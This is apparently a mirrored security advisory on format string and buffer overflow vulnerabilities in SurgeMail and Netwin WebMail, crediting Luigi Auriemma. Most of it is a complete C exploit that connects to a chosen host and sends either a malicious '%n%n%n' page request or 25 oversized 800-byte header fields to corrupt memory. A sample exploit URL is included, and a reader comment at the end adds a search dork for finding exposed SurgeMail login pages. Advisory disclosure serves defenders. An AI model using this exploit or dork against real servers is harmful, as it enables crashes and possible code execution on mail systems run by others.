|
|
|
|
| |
| SurgeMail is "a well known commercial multiplatform mail server which supports many protocols". A format string and a buffer overflow vulnerability in SurgeMail have been discovered, these vulnerabilities allow a remote attacker to overflow a buffer and manipulate the way the product works. |
| |
Credit:
The information has been provided by Luigi Auriemma.
The original article can be found at: http://aluigi.altervista.org/adv/surgemailz-adv.txt
|
| |
Vulnerable Systems:
* SurgeMail version 38k4
* SurgeMail version 39a
* Netwin's WebMail version 3.1s
Format string in webmail.exe's page command
The CGI used for the handling of the webmail interface (webmail.exe) is affected by a format string vulnerability in the function which builds the error message when a wrong page is requested and passes it directly to lvprintf without the needed format argument:
"TPL: Failed to Locate Template {c:\surgemail\webmail\panel\%s%s%s%s%s%s.tpl}{2=No such file or directory}"
Sample URL for exploiting the vulnerability:
http://SERVER/scripts/webmail.exe?page=%n%n%n%s%s%s%s
Buffer overflow in the building of environment strings
A buffer overflow vulnerability is located in the function which handles the real CGI executables (which must be not confused with the .cgi virtual files like user.cgi, admin.cgi and so on). When the server receives a HTTP request for a real CGI (like for example webmail.exe) it uses a buffer of about 20000 bytes for storing all the environment strings which will be passed to the called program. The HTTP fields passed by the client in his request are truncated at 200 bytes for the parameter and 800 for its value and are added as environment variables (HTTP_parameter=value). The lack of checks on the size of this environment buffer leads to a buffer-overflow, anyway although is possible to control some registers code execution is not certain.
Naturally both the SurgeMail and the swatch (port 7027) processes are affected by this vulnerability.
Exploit:
/*
by Luigi Auriemma - http://aluigi.org/poc/surgemailz.zip
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#ifdef WIN32
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#define sleep Sleep
#define ONESEC 1000
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#define ONESEC 1
#endif
typedef uint8_t u8;
typedef uint16_t u16;
typedef uint32_t u32;
#define VER "0.1"
#define PORT 80
#define BUFFSZ 0x7fff
int putss(u8 *dst, u8 *src);
int putcc(u8 *dst, int chr, int len);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
i,
attack;
u16 port = PORT;
u8 *buff,
*p;
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
setbuf(stdout, NULL);
fputs("\n"
"SurgeMail <= 38k4 multiple vulnerabilities "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: aluigi.org\n"
"\n", stdout);
if(argc < 3) {
printf("\n"
"Usage: %s <attack> <host> [port(%hu)]\n"
"\n"
"Attacks:\n"
" 1 = format string in webmail.exe's page command\n"
" 2 = buffer-overflow in the building of environment strings\n"
"\n", argv[0], port);
exit(1);
}
attack = atoi(argv[1]);
if(argc > 3) port = atoi(argv[3]);
peer.sin_addr.s_addr = resolv(argv[2]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));
buff = malloc(BUFFSZ);
if(!buff) std_err();
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
p = buff;
if(attack == 1) {
p += putss(p,
"GET /scripts/webmail.exe?page=%n%n%n%s%s%s%s HTTP/1.0\r\n"
"\r\n");
} else if(attack == 2) {
p += putss(p, "GET /scripts/webmail.exe HTTP/1.0\r\n");
for(i = 0; i < 25; i++) {
p += sprintf(p, "%02d: ", i);
p += putcc(p, 'A', 800);
p += putss(p, "\r\n");
}
p += putss(p, "\r\n");
} else {
printf("\nError: wrong attack number\n");
exit(1);
}
printf("- send malformed data\n");
send(sd, buff, p - buff, 0);
if(!timeout(sd, 3)) recv(sd, buff, BUFFSZ, 0);
close(sd);
printf("- done\n");
free(buff);
return(0);
}
int putss(u8 *dst, u8 *src) {
int len;
len = strlen(src);
memcpy(dst, src, len);
return(len);
}
int putcc(u8 *dst, int chr, int len) {
memset(dst, chr, len);
return(len);
}
int timeout(int sock, int secs) {
struct timeval tout;
fd_set fd_read;
tout.tv_sec = secs;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
if(select(sock + 1, &fd_read, NULL, NULL, &tout)
<= 0) return(-1);
return(0);
}
u32 resolv(char *host) {
struct hostent *hp;
u32 host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u32 *)hp->h_addr;
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
|
|
|
| Subject:
|
SurgeMail Login pages |
Date: |
4 Mar. 2008 |
| From: |
mr_daimonhotmail.com |
Even picks up SurgeMail where the name has been removed from the login page.
inurl:/cgi/user.cgi intitle:"e;login page for"e; |
|
|
|
|
|
|
